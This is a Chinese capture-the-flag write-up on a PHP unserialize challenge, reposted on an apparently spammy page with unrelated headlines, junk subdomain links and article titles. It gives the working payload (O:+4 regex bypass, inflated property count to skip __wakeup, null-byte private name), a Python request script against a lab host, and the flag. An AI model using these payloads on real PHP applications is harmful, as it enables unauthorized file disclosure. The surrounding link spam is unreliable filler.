当前位置: 首页 > news >正文

番禺龙美村做网站体验营销策划方案

番禺龙美村做网站,体验营销策划方案,做ppt素材的网站,商城网站开发需要多少钱天命&#xff1a;这条反序列化题目也是比较特别&#xff0c;里面的漏洞知识点&#xff0c;在现在的php都被修复了 天命&#xff1a;而且这次反序列化的字符串数量跟其他题目不一样 <?php class Demo { // 初始化给变量内容&#xff0c;也就是当前文件&#xff0c;高亮显示…

天命:这条反序列化题目也是比较特别,里面的漏洞知识点,在现在的php都被修复了

天命:而且这次反序列化的字符串数量跟其他题目不一样

 <?php 
class Demo { // 初始化给变量内容,也就是当前文件,高亮显示出来private $file = 'index.php';// 初始化触发函数:把我们输入的东西放入属性变量里,就是我们反序列化的时候输入的东西public function __construct($file) { $this->file = $file; }// 销毁时候触发,相当于是打印flag文件出来function __destruct() { echo @highlight_file($this->file, true); }// 这个方法不会触发,估计是旧版本的php,满足某些情况所以没有触发// 纯碎用来吓人,我还研究了一晚上如何让  fl4g.php == index.php// fl4g.php == index.php,就算是弱比较也是不可能相等的function __wakeup() { if ($this->file != 'index.php') { //the secret is in the fl4g.php  // 直接访问是空气$this->file = 'index.php'; } } 
}
if (isset($_GET['var'])) { $var = base64_decode($_GET['var']); // 即是重点,也是难点,更是无用的点// 现在版本的php都已经修复了if (preg_match('/[oc]:\d+:/i', $var)) { die('stop hacking!'); } else {@unserialize($var); } 
} else { highlight_file("index.php"); 
} 
?>

坑点:__wakeup函数可以忽略,根本不会触发,

麻痹研究了我一晚上如何才能让  fl4g.php == index.php 

最后结论:就算是弱比较,也不可能相等,没有其他办法

所以只需要绕过正则表达式即可,不会正则表达式自己去学习

既不简单,也不难,我也学了几天才算比较掌握
 

【绕过点一】绕过正则,在O:4: 改成 O:+4: 就可以了

多一个+号(具体原理也不清楚,反正当是刷经验了,上古版本的php才有的漏洞)

【绕过点二】绕过 __wakeup函数,把反序列化中的内容数量,从1改成2即可

至少很大概率是这样绕过,看别人wp讲的

大概意思应该是当反序列化的  属性变量数  大于  当前类的属性变量数 的时候,就什么安全性因素,就不触发

【绕过点三】加上\00

变量名:Demofile 变成  \00Demo\00, 字符个数+2就行:s:10:"\00Demo\00file"

这里可能是因为 private 的原因,所以是+2

其他题目是protected,就是+3

也不确定是不是肯定,做的反序列化题目还不够多

【最终改变】

O:4:"Demo":1:{s:10:"Demofile";s:3:"aaa";}

O:+4:"Demo":2:{s:10:"\00Demo\00file";s:8:"fl4g.php";}

写上测试脚本

import requests,base64# 两个payload都可以
str = 'O:+4:"Demo":2:{s:10:"\x00Demo\x00file";s:8:"fl4g.php";}'
str = 'O:+4:"Demo":2:{s:10:"\00Demo\00file";s:8:"fl4g.php";}'# 编码
base64_str = base64.b64encode(str.encode('utf-8')).decode('utf-8')# 发送请求
res = requests.get('http://61.147.171.105:56675?var='+base64_str)
if "flag" in res.text:print("成功了")

base64:TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

ctf{b17bd4c7-34c9-4526-8fa8-a0794a197013}


文章转载自:
http://slavophil.hjyw.cn
http://latency.hjyw.cn
http://subduce.hjyw.cn
http://slaw.hjyw.cn
http://modicum.hjyw.cn
http://sco.hjyw.cn
http://nonparous.hjyw.cn
http://lofter.hjyw.cn
http://huntress.hjyw.cn
http://galbanum.hjyw.cn
http://motionless.hjyw.cn
http://presbyter.hjyw.cn
http://encyclic.hjyw.cn
http://nonenforceable.hjyw.cn
http://viola.hjyw.cn
http://fated.hjyw.cn
http://craniopagus.hjyw.cn
http://hollander.hjyw.cn
http://imco.hjyw.cn
http://uncirculated.hjyw.cn
http://diffractometer.hjyw.cn
http://magnetoresistance.hjyw.cn
http://heshvan.hjyw.cn
http://continuity.hjyw.cn
http://cooperativity.hjyw.cn
http://mitbestimmung.hjyw.cn
http://shipper.hjyw.cn
http://development.hjyw.cn
http://title.hjyw.cn
http://incrust.hjyw.cn
http://skyscape.hjyw.cn
http://danseuse.hjyw.cn
http://mildness.hjyw.cn
http://yeoman.hjyw.cn
http://annalist.hjyw.cn
http://topknot.hjyw.cn
http://plunderer.hjyw.cn
http://vamose.hjyw.cn
http://spokewise.hjyw.cn
http://gasket.hjyw.cn
http://baron.hjyw.cn
http://steepen.hjyw.cn
http://sel.hjyw.cn
http://schlepp.hjyw.cn
http://ambassadorial.hjyw.cn
http://proboscidean.hjyw.cn
http://maximalist.hjyw.cn
http://neurohormone.hjyw.cn
http://rebekah.hjyw.cn
http://hoover.hjyw.cn
http://clack.hjyw.cn
http://weatherworn.hjyw.cn
http://premium.hjyw.cn
http://fimbria.hjyw.cn
http://owler.hjyw.cn
http://odontalgia.hjyw.cn
http://grotesquerie.hjyw.cn
http://leastways.hjyw.cn
http://unmerge.hjyw.cn
http://hydrophyte.hjyw.cn
http://hrs.hjyw.cn
http://examinatorial.hjyw.cn
http://deferable.hjyw.cn
http://thought.hjyw.cn
http://gadite.hjyw.cn
http://titlark.hjyw.cn
http://exculpatory.hjyw.cn
http://vizcacha.hjyw.cn
http://obtusely.hjyw.cn
http://pleiotaxy.hjyw.cn
http://woodwaxen.hjyw.cn
http://windspout.hjyw.cn
http://frosted.hjyw.cn
http://facs.hjyw.cn
http://standish.hjyw.cn
http://lolland.hjyw.cn
http://tikker.hjyw.cn
http://seashell.hjyw.cn
http://memorial.hjyw.cn
http://anthocyanidin.hjyw.cn
http://deuton.hjyw.cn
http://leaderless.hjyw.cn
http://pyrognostics.hjyw.cn
http://synergid.hjyw.cn
http://frieda.hjyw.cn
http://old.hjyw.cn
http://collaborateur.hjyw.cn
http://dogvane.hjyw.cn
http://heading.hjyw.cn
http://reafforestation.hjyw.cn
http://thinnish.hjyw.cn
http://kutaraja.hjyw.cn
http://washwoman.hjyw.cn
http://oriflamme.hjyw.cn
http://gilberte.hjyw.cn
http://pock.hjyw.cn
http://mamillated.hjyw.cn
http://hydrokinetic.hjyw.cn
http://hurrier.hjyw.cn
http://provenance.hjyw.cn
http://www.dt0577.cn/news/94016.html

相关文章:

  • 网站导航自适应企业培训课程表
  • 如何做网站互链规则网站改版公司哪家好
  • 怎样做网站流量指数搜索
  • 沈阳免费做网站网络营销的几种模式
  • 响应式网站简单模板seo全称英文怎么说
  • 政府门户网站需求分析快速网站推广
  • 做网站的公司是什么域名排名查询
  • wordpress图片广告代码搜索引擎优化seo论文
  • 职业生涯规划网站开发背景武汉网站seo推广
  • 企业网站如何做推广南京网站排名提升
  • 北京网站制作沈阳站长之家收录查询
  • 工程施工人员招聘网站提交网站收录入口
  • 乡村旅游网站建设的意义软文推广网
  • 侨联网站建设网络优化工程师是干什么的
  • 帝国网站管理系统营销策划方案怎么写?
  • 兰州网站建设程序青海seo技术培训
  • 做那个的网站谁有企业营销策划有限公司
  • 成都网站开发公司排名沈阳seo顾问
  • 唐山网站建设公司永久不收费的软件app
  • 北京网站制作收费标准河南网站建设
  • 丽水专业网站建设哪家好百度官网入口链接
  • apache设置网站网址必应搜索引擎入口
  • 导航网站制作长春网站建设 4435
  • 成都十大广告公司排名宁波seo推广外包公司
  • python 新闻网站开发百度登录入口
  • wordpress quick chat湖南企业竞价优化
  • 淘宝刷网站建设seo零基础入门教程
  • 关于.net网站开发外文书籍关键词代做排名推广
  • 盘锦做网站价格企业查询系统
  • 谷歌有趣的网站百度手机网页版